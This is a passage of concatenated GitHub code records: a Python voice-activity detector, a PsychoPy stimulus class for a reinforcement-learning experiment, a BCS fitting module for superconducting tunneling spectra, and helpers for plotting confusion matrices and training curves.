0\r\n\r\n        if (Ei - E_min) >= Thresh_E:\r\n            count += 1\r\n        if (Fi - F_min) >= Thresh_F:\r\n            count += 1\r\n        if (SFMi - SF_min) >= Thresh_SF:\r\n            count += 1\r\n\r\n        if count > 1:\r\n            speechCount += 1\r\n            silenceCount = 0\r\n        else:\r\n            E_min = (silenceCount*E_min + Ei) / (silenceCount + 1)\r\n            silenceCount += 1\r\n            speechCount = 0\r\n            Thresh_E = Energy_PrimThresh*np.log10(E_min)\r\n\r\n        if speechCount >= 5:\r\n            speech = True\r\n\r\n    return speech\r\n\r\n\r\n# Short-term energy calculation\r\ndef shortTermEnergy(frame):\r\n    return sum([abs(x) ** 2 for x in frame]) / len(frame)\r\n\r\n\r\n# Dominant frequency calculation\r\ndef dominantFrequency(frame, CHUNK = 480, RATE = 48000):\r\n    fft_wave = np.fft.fft(frame)\r\n    idx = np.argmax(abs(fft_wave))\r\n    freq = np.fft.fftfreq(CHUNK, 1)\r\n    return abs(RATE*freq[int(idx)])\r\n\r\n\r\n# Spectral flatness measure calculation\r\ndef SFM(frame, CHUNK=480):\r\n    fft_wave = abs(np.fft.fft(frame))\r\n    am = statistics.mean(fft_wave)\r\n    gm = statistics.geometric_mean(fft_wave)\r\n    return 10*np.log10(gm/am)\r\n\r\n\r\n# Example main for voice detection\r\n\r\n'''\r\n# Constants and pyaudio initialization\r\nCHUNK = 480 # Size in samples stored in each array. 10 ms for voice detection.\r\nRATE = 48000 # Samples per second\r\np = pyaudio.PyAudio()\r\nstream = p.open(format=pyaudio.paFloat32, rate=RATE, channels=1, input=True, input_device_index=2,\r\n                frames_per_buffer=CHUNK) # Input Device = 0 for computer, 1 for headset, 2 for Raspberry\r\n\r\n\r\ndef captarAudio(corr_factor = 4.73):\r\n    # Store the audio in an array\r\n    data = np.frombuffer(stream.read(CHUNK, exception_on_overflow=False), dtype=np.float32)\r\n    # Correction factor of the device being used to capture the signal. 94 dB at 1 kHz, 1 Pa reference.\r\n    data = data * corr_factor\r\n    return data\r\n\r\ntry:\r\n    # Loop to capture audio continuously\r\n    N = 0\r\n    frames = []\r\n    while True: \r\n        # Audio capture\r\n        data = captarAudio()\r\n        frames.append(data)\r\n        N += 1\r\n\r\n        if N == 50:\r\n        \tspeech = VAD(frames)\r\n        \tif speech:\r\n        \t\tprint('Voz detectada')\r\n        \telse:\r\n        \t\tprint('Silencio')\r\n        \tN=0\r\n        \tframes=[]\r\n\r\n# Exit the loop with ctrl+c\r\nexcept KeyboardInterrupt:\r\n    # Close the stream\r\n    stream.stop_stream()\r\n    stream.close()\r\n    p.terminate()\r\n    print('Interrupción de teclado. 
Finalizando programa.')\r\n sys.exit()\r\n'''","repo_name":"AndreaCastiella/PsychoacousticParametersMeasurer","sub_path":"VAD.py","file_name":"VAD.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"13175943335","text":"########################################################################################################################\n# This is class to create all the objects for the experiment\n########################################################################################################################\n\n########################################\n# Imports #\n########################################\nfrom psychopy import visual\nfrom random import choice, shuffle\nfrom popChoice import popChoice\n########################################\n\n\n########################################\n# Stimuli #\n########################################\nclass Stimuli:\n def __init__(self, window):\n self.window = window # The psychopy window we are using\n\n self.pathToImages = \"resources/\" # where we put the images\n\n # the different objects (needs the be the same names as the images)\n self.objectNames = [\"key\", \"light\", \"phone\", \"stove\"]\n self.objectImages = {} # preparing to create the images\n self.objectSize = self.window.screen[\"quarterHeight\"] # square of the quarter of the size\n self.positionRectColour = [.5, .5, .5] # a light grey\n\n # the different rooms (needs the be the same names as the images)\n self.roomNames = [\"pink\", \"blue\", \"green\", \"brown\"]\n self.roomImages = {} # preparing to create the images\n self.roomSize = self.window.screen[\"height\"] * .90 # Squares taking up most of the screen\n\n self.allImages = {} # preparing to create the images\n\n # Preparing to record all the different combinations\n self.combiRoomsOfTheObjects = {} # each object will be a key for a list with its two rooms\n self.combiObjectsOfTheRooms = {} # each room will be a key for a list with its two objects\n\n # Creating a position rectangle for the objects (so that they are all in the same colour square when presented)\n self.positionRect = visual.Rect(\n win=self.window,\n units=\"pix\",\n width=self.objectSize,\n height=self.objectSize,\n fillColor=self.positionRectColour,\n lineColor=self.positionRectColour)\n\n # Creating an empty rectangle with a border that surrounds the objects in the trials\n self.selectionContainer = visual.Rect(\n win=self.window,\n units=\"pix\",\n width=self.objectSize + self.window.screen[\"containerGap\"],\n # a height spacious enough for the trails with two objects and nice visual gaps\n height=self.objectSize * 2 + 2 * self.window.screen[\"containerGap\"],\n lineColor=[-1, -1, -1], # black\n lineWidth=5)\n\n # Creating the image for the treasure (the whole of the screen size)\n self.treasureImage = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + \"treasure.jpg\",\n units=\"pix\",\n size=self.window.size)\n\n # This is the function that users use. 
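(A short usage sketch follows.)\n    # (Editor's illustrative usage, where win is the experiment window object, hypothetical here:\n    #    stim = Stimuli(win); stim.createStimuli()\n    #    stim.combiRoomsOfTheObjects['key']   # -> a list of two room names, e.g. ['pink', 'blue']\n    # this sketch is not part of the original experiment code.)\n    # 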
It will create the objects and their combinations\n def createStimuli(self):\n self.createObjects()\n self.createRooms()\n self.createCombinations()\n\n # Creating all objects and storing them in appropriate dictionaries\n # The use of their names as keys makes them easy to retrieve\n def createObjects(self):\n for name in self.objectNames:\n image = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + name + \".png\",\n units=\"pix\",\n size=self.objectSize)\n\n self.objectImages[name] = image\n self.allImages[name] = image\n\n # Creating all rooms and storing them in appropriate dictionaries\n # The use of their names as keys makes them easy to retrieve\n def createRooms(self):\n for name in self.roomNames:\n image = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + name + \".jpg\",\n units=\"pix\",\n size=self.roomSize)\n\n self.roomImages[name] = image\n self.allImages[name] = image\n\n # Randomly creates the combinations for each object and its associated rooms\n def createCombinations(self):\n roomNamesSelect = self.roomNames.copy() # copy to avoid messing up\n roomNamesSelect = roomNamesSelect * 2 # need twice the rooms because each room has two objects\n\n objectsNamesSelect = self.objectNames.copy() # copy to avoid messing up\n shuffle(objectsNamesSelect)\n\n # For each room create a key for which there is an empty list\n for room in self.roomNames:\n self.combiObjectsOfTheRooms[room] = []\n\n # For each object...\n for object in objectsNamesSelect:\n # ...randomly select a first room (and take that room out of the list) and...\n room1 = popChoice(roomNamesSelect)\n # ...randomly select a second room that cannot be the same as the first room.\n room2 = choice(roomNamesSelect)\n while room2 == room1:\n room2 = choice(roomNamesSelect)\n # take out the second room from the list\n roomNamesSelect.pop(roomNamesSelect.index(room2))\n\n # create the key of that object and put its two rooms in its list\n self.combiRoomsOfTheObjects[object] = [room1, room2]\n # append the object to each appropriate key of the object\n self.combiObjectsOfTheRooms[room1].append(object)\n self.combiObjectsOfTheRooms[room2].append(object)\n\n # This function can be used to draw a container on both sides of the screen\n def drawContainers(self):\n self.selectionContainer.pos = self.window.screen[\"left\"]\n self.selectionContainer.draw()\n\n self.selectionContainer.pos = self.window.screen[\"right\"]\n self.selectionContainer.draw()\n\n########################################################################################################################\n","repo_name":"Karakaii/python-exercise-replicating-RL-task","sub_path":"stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31161243063","text":"from copy import deepcopy\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom NanonisMeasurement import NanonisMeasurement\r\nfrom Physics import BCS, apply_lock_in_broadening\r\n\r\n\r\nclass NIS:\r\n \"\"\"Class containing standard data treatment applied on NIS tunneling spectra\"\"\"\r\n\r\n unit_factors = {'T':1e12,'G':1e9,'M':1e6,'k':1e3,'m':1e-3,'u':1e-6,'n':1e-9,'p':1e-12,'a':1e-12,'V':1}\r\n\r\n @staticmethod\r\n def get_coherence_peaks(spectrum_dIdV):\r\n \"\"\" find coherence peaks using cubic interpolation assuming that they are on opposite sides of x=0\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS 
spectrum\r\n Returns:\r\n coherence_peaks: [ [pt1x,pt1y],[pt2x,pt2y]]\r\n \"\"\"\r\n left_peak = spectrum_dIdV.get_maximum(x_range=(None,0),interpolation=\"spline\",interpolation_args={'k':3})\r\n right_peak = spectrum_dIdV.get_maximum(x_range=(0,None),interpolation=\"spline\",interpolation_args={'k':3})\r\n return [left_peak,right_peak]\r\n\r\n @staticmethod\r\n def get_gap_estimate(spectrum_dIdV):\r\n \"\"\" calculate a rough estimate of the superconducting gap based on the position of the coherence peaks \r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Returns:\r\n Delta (float): estimate of the superconducting gap. systematically larger than the true value\r\n \"\"\"\r\n cpks = NIS.get_coherence_peaks(spectrum_dIdV)\r\n return(cpks[1][0]-cpks[0][0])/2\r\n\r\n @staticmethod\r\n def get_normal_state_conductance(spectrum_dIdV,n_pts=10):\r\n \"\"\" calculate approximative normal state conductance by averaging the first and last data points\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n n_pts (int): number of data points at both ends to use for averaging\r\n Returns:\r\n normal state conductance (float)\r\n \"\"\"\r\n x,y =spectrum_dIdV.get_x_y()\r\n delta = NIS.get_gap_estimate(spectrum_dIdV)\r\n\r\n mean_y1 = np.mean(y[:n_pts])\r\n mean_x1 = np.mean(x[:n_pts])\r\n correction_factor1 = BCS.DOS(mean_x1,delta)\r\n\r\n mean_y2 = np.mean(y[-n_pts:])\r\n mean_x2 = np.mean(x[-n_pts:])\r\n correction_factor2 = BCS.DOS(mean_x2,delta)\r\n\r\n return np.mean([mean_y1/correction_factor1,\r\n mean_y2/correction_factor2])\r\n\r\n @staticmethod\r\n def get_peak_increase(spectrum_dIdV,n_pts=10):\r\n \"\"\" calculate the approximate ratio of coherence peak height / normal state conductance\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n n_pts (int): number of data points at both ends to use for averaging\r\n Returns:\r\n coherence peak height / normal state conductance (float)\r\n \"\"\"\r\n pks = NIS.get_coherence_peaks(spectrum_dIdV)\r\n s0 = NIS.get_normal_state_conductance(spectrum_dIdV,n_pts)\r\n return np.mean([pks[0][1]/s0,pks[1][1]/s0])\r\n\r\n @staticmethod\r\n def correct_bias_offset(spectrum_dIdV):\r\n \"\"\" shift the bias such that the two coherence peaks are symmetric around 0\r\n assumes that the shift is smaller than Delta\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n \"\"\"\r\n left_peak,right_peak = NIS.get_coherence_peaks(spectrum_dIdV)\r\n shift = (right_peak[0]+left_peak[0])/2\r\n spectrum_dIdV.apply_transformation(lambda x,y:(x-shift,y))\r\n return spectrum_dIdV\r\n\r\n @staticmethod\r\n def real_dIdV(x,Delta,T,sig0=1,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10):\r\n \"\"\" dIdV as measured in a real experiment, taking into account temperature effects and smoothing due to the AC Voltage applied by the lock-in\r\n Arguments:\r\n Delta (float): gap in eV\r\n T (float): temperature in K\r\n sig0(float): normal state conductance. default: 1\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. 
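(Added note: when only V_ac_rms is given, the body uses V_ac_pk = V_ac_rms*sqrt(2); e.g. 5 uV rms corresponds to about 7.07 uV peak.) 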
Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the integration on int_point_factor more points than E\r\n \"\"\"\r\n Vac = V_ac_pk if V_ac_pk is not None else V_ac_rms*np.sqrt(2)\r\n \r\n E_range = (x[0]-Vac,x[-1]+Vac)\r\n theory = BCS.dIdV_NIS_eV(E_range,E_res=x[1]-x[0],\r\n Delta=Delta,T_N=T,int_point_factor=int_point_factor,Gamma=Gamma)\r\n if V_ac_pk is not None or V_ac_rms is not None:\r\n theory = apply_lock_in_broadening(theory,V_ac_pk = V_ac_pk, V_ac_rms=V_ac_rms,integration_factor=int_point_factor)\r\n return sig0*theory.evaluate(x,interpolation='linear')\r\n\r\n @staticmethod\r\n def fit_Delta_sigma(spectrum_dIdV,T,sig_guess=None,Delta_guess=None,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta and sigma0\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n T (float): temperature in K\r\n sig_guess (float,optional) initial guess for the normal state conductance. if None: estimated from the data\r\n Delta_guess (float,optional): initial guess for the superconducting gap. if None: calculated from the coherence peak positions\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [sig0,Delta], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n p0 = [ NIS.get_normal_state_conductance(spectrum) if sig_guess is None else sig_guess,\r\n NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess]\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,sig0,Delta:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n\r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[1],\r\n T = T,\r\n sig0 = popt[0],\r\n Gamma = Gamma,\r\n fit_parameter = ['sig0','Delta'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n\r\n @staticmethod\r\n def fit_Delta(spectrum_dIdV,T,sig0 =None,Delta_guess=None,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n T (float): temperature in K\r\n sig0 (float,optional) normal state conductance. if None: estimated from the data\r\n Delta_guess (float,optional): initial guess for the superconducting gap. 
if None: calculated from the coherence peak positions\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [Delta], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0 = sig0 if sig0 is not None else NIS.get_normal_state_conductance(spectrum)\r\n\r\n p0 = [ NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,Delta:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n \r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[0],\r\n T = T,\r\n sig0 = sig0,\r\n Gamma = Gamma,\r\n fit_parameter = ['Delta'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n\r\n @staticmethod\r\n def fit_T(spectrum_dIdV,Delta=None,sig0 =None,T_guess=0.1,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameter: T\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Delta (float,optional): value of the superconducting gap. if None: calculated from the coherence peak positions\r\n sig0 (float,optional) normal state conductance. if None: estimated from the data\r\n T_guess (float,optional): initial guess for the temeperature in K. default: 0.1K\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. 
Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [T], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0 = sig0 if sig0 is not None else NIS.get_normal_state_conductance(spectrum)\r\n Delta = NIS.get_gap_estimate(spectrum) if Delta is None else Delta\r\n\r\n p0 = [ T_guess ]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,T:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n \r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = Delta,\r\n T = popt[0],\r\n sig0 = sig0,\r\n Gamma = Gamma,\r\n fit_parameter = ['T'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n \r\n @staticmethod\r\n def fit(spectrum_dIdV,Delta_guess=None,sig0_guess =None,T_guess=0.1,V_ac_pk=None,V_ac_rms=None,Gamma_guess=0,int_point_factor=10,x_range=(None,None),**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta, sig0, T, Gamma\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Delta_guess (float,optional): intitial guess for the value of the superconducting gap. if None: calculated from the coherence peak positions\r\n sig0_guess (float,optional) initial guess for the normal state conductance. if None: estimated from the data\r\n T_guess (float,optional): initial guess for the temeperature in K. default: 0.1K\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. 
Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma_guess(float): initial guess for the Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n x_range(float,float): the x-range (in units of x data) of the curve that should be used for fitting.\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [sig0,Delta,T,Gamma], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = deepcopy(spectrum_dIdV).crop(x_range)\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0_guess = sig0_guess if sig0_guess is not None else NIS.get_normal_state_conductance(spectrum)\r\n Delta_guess = NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess\r\n\r\n p0 = [ sig0_guess, Delta_guess, T_guess, Gamma_guess ]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum_dIdV.fit(\r\n lambda x,sig0,Delta,T,Gamma:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n\r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[1],\r\n T = popt[2],\r\n sig0 = popt[0],\r\n Gamma = popt[3],\r\n fit_parameter = ['sig0','Delta','T','Gamma'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms,\r\n x_range = x_range\r\n )\r\n \r\n\r\nclass NISFitResult:\r\n \"\"\"Class storing the results of an NIS fit\"\"\"\r\n\r\n def __init__(self,spectrum_dIdV,Delta,T,sig0,Gamma,fit_parameter,popt,pcov,V_ac_pk=None,V_ac_rms=None,x_range=(None,None)):\r\n \"\"\"Create a ISFitResult object\r\n \r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): spectrum which was fitted\r\n Delta (float): value of the superconducting gap\r\n T (float): temperature in K\r\n sig0 (float) normal state conductance\r\n Gamma(float): Dynes parameter in eV\r\n fit_parameter(list of string): names of the parameters that were fitted in the order corresponding to the values in popt\r\n popt (np.array): optimum values as calculated by scipy.curvefit\r\n pcov (np.array): covariance matrix as calculated by scipy.curvefit\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. 
Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n x_range (float,float) the x-range (in units of x data) of the curve that should be used for fitting.\r\n \"\"\"\r\n self.spectrum = spectrum_dIdV\r\n self.Delta = Delta\r\n self.T = T\r\n self.sig0 = sig0\r\n self.Gamma = Gamma\r\n self.fit_parameter = fit_parameter\r\n self.popt = popt\r\n self.pcov = pcov\r\n self.x_range = x_range\r\n\r\n if V_ac_pk is None and V_ac_rms is None:\r\n raise ValueError('Either V_ac_pk or V_ac_rms has to be provided but none was given!')\r\n self.V_ac_pk = V_ac_pk if V_ac_pk is not None else V_ac_rms*np.sqrt(2)\r\n\r\n self.Delta_err = self.perr[fit_parameter.index('Delta')] if 'Delta' in fit_parameter else 0\r\n self.T_err = self.perr[fit_parameter.index('T')] if 'T' in fit_parameter else 0\r\n self.sig0_err = self.perr[fit_parameter.index('sig0')] if 'sig0' in fit_parameter else 0\r\n self.Gamma_err = self.perr[fit_parameter.index('Gamma')] if 'Gamma' in fit_parameter else 0\r\n\r\n \r\n @property\r\n def V_ac_rms(self):\r\n return self.V_ac_pk / np.sqrt(2)\r\n \r\n @V_ac_rms.setter\r\n def V_ac_rms(self, value):\r\n self.V_ac_pk = value*np.sqrt(2)\r\n \r\n @property\r\n def perr(self):\r\n return np.sqrt(np.diag(self.pcov))\r\n\r\n def plot(self,fig=None,ax=None,x=None,x_unit=None,fit_plot_args={},plot_spectrum=True,spectrum_plot_args={},legend='best'):\r\n \"\"\"Plot the fit.\r\n \r\n Arguments (all arguments are optional):\r\n fig (matplotlib.figure): figure to plot into. if fig and ax are None: create a new one\r\n ax (matplotlib.axes): axes to plot into. if None: create a new one\r\n x (np.array(float)): x values for which to plot the fit in V. if None: use the values of the fit\r\n x_unit (string): unit of the x axis. default: same as the data spectrum \r\n fit_plot_args (dictionary): style arguments for plotting the fit, passed on to axes.plot. 
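(Illustrative, assumed values: e.g. fit_plot_args={'color': 'r', 'lw': 2} for a red fit line.) 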
If none provided: dashed line\r\n plot_spectrum (bool): whether or not to plot the measured data that was fitted in the background, default: True\r\n spectrum_plot_args (dictionary): style arguments for plotting the measured data, passed to axes.plot\r\n legend (string or None): location of the legend (see matplotlib.axes.plot - loc argument) or None for no legend, default: \"best\"\r\n Returns:\r\n fig,ax of the plot\r\n \"\"\"\r\n if x_unit is None:\r\n x_unit = self.spectrum._x_unit\r\n\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if plot_spectrum:\r\n self.spectrum.setup_plot(ax)\r\n ax.set_xlabel(f'Bias ({x_unit})')\r\n ax.set_ylabel('dI/dV (a.u.)')\r\n \r\n if plot_spectrum:\r\n if x_unit != self.spectrum._x_unit:\r\n spec = deepcopy(self.spectrum)\r\n fac = NIS.unit_factors[self.spectrum._x_unit[0]]/NIS.unit_factors[x_unit[0]]\r\n spec = spec.apply_transformation(lambda x,y: (x*fac,y))\r\n else:\r\n spec = self.spectrum\r\n spec.plot(ax,plot_args = spectrum_plot_args)\r\n \r\n if x is None:\r\n x = self.spectrum.get_x(self.x_range)*NIS.unit_factors[self.spectrum._x_unit[0]] # x in V\r\n \r\n y = NIS.real_dIdV(x,Delta = self.Delta, T = self.T, sig0=self.sig0, V_ac_pk=self.V_ac_pk, Gamma = self.Gamma)\r\n\r\n if fit_plot_args == {}:\r\n fit_plot_args = dict(ls='--')\r\n ax.plot(x/NIS.unit_factors[x_unit[0]],y,\r\n label=f\"BCS fit: \\nT = {self.T*1e3:.0f}mK\\nΔ = {self.Delta*1e6:.0f}µeV\\nVac = {self.V_ac_rms:.0f}µVrms\\nΓ = {self.Gamma*1e6:.0f}µeV\",\r\n **fit_plot_args)\r\n if legend is not None:\r\n ax.legend(loc=legend)\r\n return fig,ax\r\n ","repo_name":"djwander/stmtools","sub_path":"stmtools/SuperconductingSample.py","file_name":"SuperconductingSample.py","file_ext":"py","file_size_in_byte":21735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15054892279","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 12:00:26 2022\n\n@author: sergio\n\"\"\"\n\nimport numpy as np \n\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt \n\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes,\n save_name,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n classes = classes\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n # ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n ylim=[1.5, -0.5],\n # ... 
and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n fig.savefig(save_name)\n \n \ndef visualize_results(history,name):\n \n # Plot the accuracy and loss curves\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n \n \n plt.plot(epochs, acc, 'b', label='Training acc') \n plt.plot(epochs, val_acc, 'r', label='Validation acc')\n plt.title('Training and validation accuracy')\n \n plt.legend()\n plt.figure()\n \n plt.plot(epochs, loss, 'b', label='Training loss')\n plt.plot(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n 